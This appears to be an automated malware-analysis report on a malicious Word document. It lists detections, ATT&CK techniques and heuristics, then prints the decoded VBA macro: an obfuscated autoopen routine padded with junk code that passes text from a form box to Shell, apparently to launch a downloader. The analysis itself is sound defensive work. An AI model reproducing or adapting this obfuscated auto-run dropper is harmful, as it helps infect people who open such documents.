MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and the 'Shell()' function is called, indicating an attempt to execute arbitrary code. Heuristics also indicate suspicious invocations of 'cmd.exe' and references to 'PowerShell', suggesting the macro is designed to download and execute a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Malware.Generic-6782748-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6782748-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(XdUSCv, bCkvTwFz), fjLwJ) Set tIOqwjKWwsdIoPPibh = juFhibYjcPJwwnOWfj -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() NWNfj -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.iec.ch In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11854 bytes |
SHA-256: 6f8e6a2f19de1c5745061d0959b26ff0aa8db076bde1b6aeb9005e46bb4f9534 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
317 of 372 identifiers look randomly generated (e.g. 'qjlYiFwXtZJWjOGZBYwrWFFo') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FvjGNhQUzwi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
NWNfj
End Sub
Attribute VB_Name = "IbTCQRfrKUWmlz"
Function NWNfj()
On Error Resume Next
Set cwiDdAtOQGCUKUfqmVVvsFwK = qzoCwnPjCwwBzZkOtwcUU
Select Case CTvsnfiFXCYVnCEMT
Case 120804152
nHVipmvljwIUqMYvVHEAjw = buddmhKhdJhhKjkGFsuCGOhh
OHjFOSDpLuoLJID = 145348705
fKJfOPkBzHpvpNMwU = abbOriswmwuwjqjoiXY
Case 195258502
rwEPKNtVjbPokduqRTfmQcoG = CByte(XwPAipXrYicXwj)
zcFViIzMlwQEtqjPK = ChrW(MmPdVBlrzLvSSSmOnnXTbuYl)
BOliApTSaltBVHDjnKnR = Log(jzRiDwrrVROdwTnAMw)
End Select
Set KPLPROGFwOGGdwNJmQiiiIh = UszuphtwRHOtLciwfNdc
Select Case JafoJbriaNBhhuYRMPQVH
Case 269245173
iUwKhkzRiFtLRSFjFC = ruMLiiJhTzNHdUFzU
RJwbwXcnjGzGiKTr = 325723743
VIUbXDjTRwPqMVlVnsR = zpjqwDiMOCnmWibLq
Case 276844901
vvcFiYsuiVNWaZhdfZddU = CByte(TFPKdThtZfzHWVVkFS)
IDrBfNMpBwmNMQa = ChrW(XpTuYMkvhYSDLIuUKWL)
cDjwRijwnSkqvtwvl = Log(hwTvTHvIisCRCqEJzTF)
End Select
Set pLTkdWVustmzsp = YfJVsBATtfJhHoErmA
Select Case wbauMrZtWkAFadjnDsNXzpr
Case 167952368
ToOFoBAwzstzlzd = IditajEaBBzZdtHjB
sDLnijAGakmpRvkErLJjik = 237160000
EmCbUFlKwvEZGUuztTIToL = DoZBvZVKITYivjZmVzctW
Case 281001674
zXRKmLcQwtDzmvEp = CByte(bkwGilwTUjmTMSNMibiiP)
zfCZpsjmrRKsRluEPlSrS = ChrW(pwmapmITZKUtlQDIwGmh)
VJTAbSaMsMYPVqGnOCuiXr = Log(XYAdAGpLFloTmSaNTiHjwwdP)
End Select
Set iNsRCPUEzMVTVz = SwbzCGjWWwuToMbKYEPhXIbS
Select Case oibVdKFfMwimwizzrVSIwf
Case 290048820
BwOGQYKVIJNYHAsoon = QwYbVRijmIKtJqFUhvzP
lJdnVZrqciTJCcZcUtoirY = 80398257
QEhBfLtpXpinuoAsqpKirkGO = rMCKhvNzfWQsqLQldlNz
Case 249848343
fswsBNhHfzSVozqfqtQqP = CByte(jAzittNwsQuJjJNpt)
PYrTZUXRuwvUhvTNIwsXUntj = ChrW(CbiTjRAzQaqaQbf)
czODYiwqSBRzWfc = Log(KNXsswNjuURVcnrVMPsn)
End Select
Set AXnNMovsDAOVSirjzuiM = DUWlBPjosBNOoovBDMdp
Select Case UGTMKdvSYminAzDQbKY
Case 78394255
LwBHiqvivhFWEi = DZrlnWTPianrskbB
dUIHSEjnzncEZR = 315646177
qMCTnYhrjShqzDuUj = skZFlVKwnirKJJ
Case 287287260
BXZiRFnQXzXpowtIYYZ = CByte(pkbhJokwAZIXzXBW)
wjmwJilzVJrojlkkfmRwsYc = ChrW(oQwqzqRuXNapmPjCpj)
itJRnYnTkkZBZGSHsjuzfs = Log(RVLuzQGPHJlzafwLSMWhJzMB)
End Select
Set WQXoRZzOBzTcBAaVWESV = JMiWAYLjEBSNlGwHUiLHYmCN
Select Case CPdcLcXViNEoSR
Case 7586257
iwwAOQtiNBZHOZWKURzJiD = YvsCtsSBNKTppFNplVzOJDQ
JqtUATsGiDXFWOA = 245502480
zLwujjEHcLnjpkViltCzwBt = NKmiHSXUNUJrTLZJp
Case 81953085
IEWpSBblVwmvwRihYuV = CByte(JnTVVbiLZTtKmc)
NqVUhjhCWbYKZpiBPTMPUl = ChrW(UrXQLBEcJWfQrD)
oUbkwtwQEVvSdqaNRco = Log(cJQWBRzOouYmzp)
End Select
Set oWUDoiTNacituRAAaJXnS = MsJXGVLzMprpoPoHw
Select Case pvkAiaCuXbkVQPPVKbtQYw
Case 14399579
PpBEdlMTKjzXiLNjVLzj = rYcZSEMNhSrtHlpZ
RmPRKjSsnzNKvMASQYQYfKjz = 34576014
OFdbaYJXuLUvjpKjfFzD = FrbqMYASGFPMiUMPMZoAYS
Case 266272049
VrbOwfbACqJOCkNAJEnFEiwV = CByte(RTjKCNmCdUVzmUaiOKrKwMbL)
rUfitmtFQjMuqzdXLZQsDW = ChrW(NbqYHLzFrUWKsHUjhbrVn)
jYKNmnmKTkVkRHCOm = Log(RbUaTolQqpiQLAwwrRNtYLS)
End Select
Const bCkvTwFz = 0
Set LidXFbKzEhrCBaG = BuEssBIKhvKJkczSivOoZFC
Select Case OZQaztCdWUJNAnOJW
Case 126691057
KRAOciZTFLRSvsodSliLnt = nQSlRujFSGQszOLosZZw
EBOVMKvYoHCQkNzJw = 53744798
ZGzMiAoPHwplNwOiPEQ = klhdwObOBOfvRAX
Case 75663739
ojVXuobwWoTWihF = CByte(ConZVOQYZOsRuUMZCdaU)
hpwFfcZHrWhZPOMjljaTwwj = ChrW(KECbuUAGklVwrUqmrRhrLrfF)
qQtABwjJAubZzN = Log(VaodsNsRtobiQpkTYw)
End Select
Set zJNpwJwIOnZAkfzVavohA = ojCzdMXavMurifTmD
Select Case ZzDDofuAlPTzLGhhUjnB
Case 208167104
korNGswUBorHICOlsXCda = GzAoJBKmwCBpMOL
YBDROfGEzfSioQwCJci = 301885804
RjvJOppFTqAaRwAZ = uarwqiicziEzjkf
Case 116816717
HSHIzqQwioSIXRzc = CByte(iHCQaFNjQGlGmG)
IDqiRAukbwMpQTaRGW = ChrW(BYPzjMubjjfrrizAUaOK)
nXbSOQzMqpikHEwsGKWWYLAv = Log(UHSTFqsLjNAoiSw)
End Select
Set wQXjpFEHuKUTVZzMiW = qGRzLGOwGVjqsNzRLiuhEPG
Select Case vVnCbuRtMfPMhTLdaIw
Case 251867511
TbFWImhopqbzrCpS = VMDqiNwmksSRGvRU
buhfTHjFWpnMqQWKO = 256383134
iUpOHjXuPXiuKfcavljBE = lHYKZubwGsIflulfaw
Case 314295304
UhoudhNpaZikjOji = CByte(zJdSSQqlitioPKjGrwDSdj)
jlWhJXwWKDpdnSuCRzIwofB = ChrW(OwipQjPMQRzhvjjN)
WXlahwozwmVVhDAkLTLt = Log(GiocMVVMGiRuTRIP)
End Select
Set CPTmLbXHdpqQUbDcIdMSEcIB = rSuUTmHARjdAoaii
Select Case JvEVIjVmNojHsaHR
Case 174923793
IdmKDiPCrZbTDdntSM = qjlYiFwXtZJWjOGZBYwrWFFo
KtkGTzHuUjkWEEEFKWdiDsFz = 29941133
VUVbldwcXLNRZaCcPiVCwU = mMibGsSomBhdnZswGabjsrs
Case 324251490
jbcabCqAaiPCBq = CByte(EXaQrwPDWjOcUnBvTlXaR)
NLzrcMqdvEkrbVQbFHRYGu = ChrW(ZVNYmvQiPTPJPRAT)
MskKsdMffrjQJt = Log(TwZVPoEiiaUXMLAKFoOLN)
End Select
Set dITYnSWIvPiKmFDnYSORK = lLKfOjtZmAVFSvHTm
Select Case nJKfRZqKIEAhJoa
Case 81608033
HOHEpPWciohnIfFjIiB = FukpDXpYEqhfFXA
iBwunCikJXAYvAB = 66168239
FRNdSARZwYsHBhkfACG = GTDMzfjWQdEpXGAFnbLA
Case 214719114
piqdHpQtuwuiSmOAim = CByte(uJUUCkvhfrZqFzmdZW)
YqGWjFusoNrmwYjmLU = ChrW(nsMIkBUHoifJpiHO)
nmlOHrHToFcSZNbIPidM = Log(VVOzGOIECIpKCwYivfAEp)
End Select
Set zApSKjMWKHTzvNzrtc = HchqMWUHjbBEWqNTau
Select Case tWqwzfibhJLuSQqYtSKcw
Case 280600878
cvIDwGhuYwLjwQfhLiv = wYhinfSUBQSlCwOBrblUzP
zHhuHNkwzBDaEOaQRoNtIi = 169427777
wCdqktanjmjaGlLGQRUj = YJnRLTfmWiSiAwFkuODaQqSi
Case 338384654
fdGcqKphZspYZavA = CByte(HRsFpFWWDQJihrJR)
oCftoIsTWMuVod = ChrW(PdKNGDpXkGmtjzsBjHXl)
VTTIAmTscAOmdSDjwLzwfvm = Log(PLTiLNOQsnuJrE)
End Select
XdUSCv = FvjGNhQUzwi.TextBox1 + iHGXGD + UjvanMZh + pSphOmwu + tprEhb + jiIInpqd + EaVcZLRz + sLMlAnkj + tTZLNIuf + qkTHqPCR
Set ASpiGCRLvlMnczXSzaXoaFsn = nwRicLHIYwonjF
Select Case sGNGbvKodlhXVV
Case 147877125
ZCcSEzhSaFiEAjfNVWvUrmLH = KnsvnlnBBOkHmwsZujWQ
otGUBwZCDnrUptL = 270306146
mTrCwUuFjZDvzGpqWW = lbmnNzzbsnzDjkWtCYEpZLO
Case 120123256
WHGjBdSXRDwzjiDBsCS = CByte(WWKaMnSSjUZNUOqsqvqJi)
PjatVuBnjJvjCAwjUOLA = ChrW(wijfRnKKzLJGqHizSRXQto)
RnMqwKabwipSCrOEH = Log(diwmaLtRjBzojzHORsFwOA)
End Select
Set aqnwZMXJXwFRiE = jWdzaOpHszEtDh
Select Case BVFWFAcTEwDojClhsu
Case 339757325
pjIupljvwUTTcDukMI = CECYBWaIFGQLwEMfUMLjURhU
fkMcHBVkvzQmHHYPcdoiJ = 135920396
QYZXAbikXhoWlOjzF = bDGvsNFmRrnsmaKVwDhdUIQ
Case 86477890
ESkmAwjjnhRIUfMROJnwivN = CByte(QRcPbaSmtBouVAQu)
IwssMbXVMGwdQOI = ChrW(YVjUQHNPfPTrRwN)
spVzVTDqEuPUUIdmjpwihaq = Log(ldNzIjDPsFkatK)
End Select
Set bYwszMKrjsQfzjnpV = WWHfLTHNtGCOjRV
Select Case aUWNrziTnQbDtco
Case 210701675
HnXKwNikmTEpSIz = rISSHRXrorusEUQR
HcizwiHsdFfadUIctC = 133911767
NwqPfWESmjRCmSLjUM = iLaiLrRKXmPKRwvJJlORZZo
Case 40244210
ndoLJbIjHqLmTiYOLhjWVAGq = CByte(BuFvVEWUiYOdzNKH)
KGkWpGqDOsHjbnWzBHhC = ChrW(mloSlGJlMUWOrpAGnMoPr)
MPkGksfzFdFtYUw = Log(EAjRBXlVkzWrOv)
End Select
Set ljqhfnFETZkvSHiv = fDJrwXjnLiITNSilC
Select Case GfHDXiMjTLbESwTwHFiVn
Case 55280938
uUEzlFHFJQWbPJb = iiSEYLHQLARKZCjzwZNj
hbaMGRnvVDmjZErVE = 223079270
NnlkozjGkZcqvsNwCrsSt = VpzidAwpburiWivqlO
Case 170839862
DWsMroLHodMPotSv = CByte(KTjIuzizQWiAMFdsiPwwkn)
oqAwibqcMzCbvtCIZKNaRc = ChrW(cYiXFdTzDXdrRuz)
XatWAJiiwjHZmW = Log(XMjYZzEkwsAzERCl)
End Select
Set zmfDzjWzEBiJio = jOFwmvCEPrspFcumkKJpn
Select Case uKsGMKZPAZApNVRLuFviQM
Case 42923693
RVKOzwVwvtTuFfisizrToPO = UZQDuEZiEzprzLSBEBu
BWFOWDEQUnFBHmuXiS = 28689009
TlqHprsThqOnUtWzUBjrAJ = RsojNQuSmzEBQjzZ
Case 205618496
kidYShNPzDhlMpJX = CByte(PBHfCnYcqQsGQWbBhPa)
sZGVzTqkAkOrtHhXXiivF = ChrW(cRVJjhFjfZjmjqumijwncFBB)
JoEiChfizzpAomJf = Log(EpIGarclwwzSTWPTw)
End Select
Set LcwoTuKXDsAJYJdbGJUj = iiukzzHYEQtBmfSfLpfF
Select Case rzwSIEVfXvLPDjwEEUz
Case 25626047
zbHIliLvuUpdDnivRrsltjVi = jwUbGViCarXrKXZJjcbWl
tTIndERFTGYWCf = 287394619
nwGbcvGDGUTcJDuMzi = ASTsikUYRSnUuRO
Case 269847942
PKXzMEjIlpvPLMWTZqBT = CByte(crHWolSzYKvORzp)
HoOnjtuZJGFRBUaN = ChrW(WmSPaXTNJMiAAtPhIS)
njWjwiNifBwDjh = Log(vKWvhQuaZjPYIMqksCYaozC)
End Select
Set fRmhiCzpYISzuGHjLBC = JzRJmsifLDDHDrZkZaWsHLpL
Select Case HTHQmuzLoPjAcuq
Case 132680151
dUFKvChXKlfJpwJFAf = aOZJDwPbsjwfjYniUFw
QatcIUBwRWubPStF = 25993857
COjaonNGzlBQpzCT = AVzAiuQKVpUPOfi
Case 198105349
DjfpmGOBVQwAhuZ = CByte(KsjGLTUPQSztrlFTmjwSnROP)
wNdTJovuSDmwXzkPQZTIV = ChrW(kKcOBwHJsiUXMGqv)
iCwYhTVOiMCXsuG = Log(odSrvnwnJKIdAldZ)
End Select
Set UKjXKYPqNABPIwALXfhOlVDa = biNSVCwUPWvbrMmcYjicm
Select Case HAfiutVKzHIoiuCYr
Case 326867274
vtbFkfTumNlVzw = XNnrHDzEXoSDisaz
kYrWfvuzbzizNlKrWWplApB = 312293112
ERRcoCMNukZEprSssjEQGK = ILIVkOruXwhbdd
Case 147336008
wWkSAlnhfXsIJwiitOJRjj = CByte(wDqCIHQoOVsHuWrBWYb)
NVilaRwhPTFHPulPKifZPj = ChrW(nQpkLCNmtFqOcUEcqJiZ)
QlszkbqosBbisvUkhmfChLB = Log(jJuFGpQjKjWizkbaWwA)
End Select
kkZkrI = Array(DXNEkTT, hliDluU, YpnzL, Interaction _
_
_
_
_
_
_
_
.Shell(XdUSCv, bCkvTwFz), fjLwJ)
Set tIOqwjKWwsdIoPPibh = juFhibYjcPJwwnOWfj
Select Case nsmXUvvMkwUKMbJqbo
Case 179662405
OZziGnvhVZskwGtbwWkli = nnHEwVmzmiDzGNsDR
AOqLDkLGhitEDpBzmLbB = 285385533
uYmKjzAjitFDlTYcjWt = nEDiiOzGbjcPpaURYtEMFB
Case 340467284
zADibKcFIAlpUEfSBtEBRpOK = CByte(HEqSjkmEDiiKPfQEXHooiwTN)
KMwziJltiTGlnbQzkQWBHl = ChrW(oztiZVUKkcfVYpHVY)
RjLKSjfYpufzMiZzIAobLXO = Log(VIHGsKdvzIpEDdi)
End Select
Set OhofzUbKVjfvrYJUtz = VvZZEintzvizmwKiEVrFr
Select Case KBIllwilonOiZXpHjzJabO
Case 287811652
tzjuEwCsphlYQSzrLNGrk = WnpwmuvQMvJYsmQ
jqkWpslQrRzSPOIAzlcsEI = 81622590
wYVqPraLaWjPGOS = BYEUudBzmIZGJXjYicZQ
Case 150490802
BzqorshtukTzrfDrNTXXEGSU = CByte(DmIldoBHFXEiGl)
QtOonLfEUmPGszr = ChrW(hWmnGZHQwRplIwMGhPHLrdhq)
inwOiIIObXIUwCqlwsV = Log(tvVaIZdsfEDovPXlIB)
End Select
Set jTkvEdRnJIkOAiKzwHzjGY = CkTOncMBqzwulsBZkW
Select Case FmlHpiRIPLfvfLwhKlOdL
Case 322415202
tRDnZEuhNJXTkRd = jWTzqKBRjpKroVtXIfrp
vsDUdRmHrLQjHiHrzQjPm = 22774566
uDssPzLFZnsldPcMtPKsd = KhnljIOIazrIJRlZWHjGqsP
Case 325296672
bXEqAcLGzsKFiTCqQNtt = CByte(GKbTtCLWDSSpHEkKSZ)
jBKZaUrodQZiVDHVMd = ChrW(HZzjvasPXORfwoWNUv)
AzBOiGinwlzjYhwSwhRPw = Log(EUZLlbqzqnabcXGLQdRnv)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.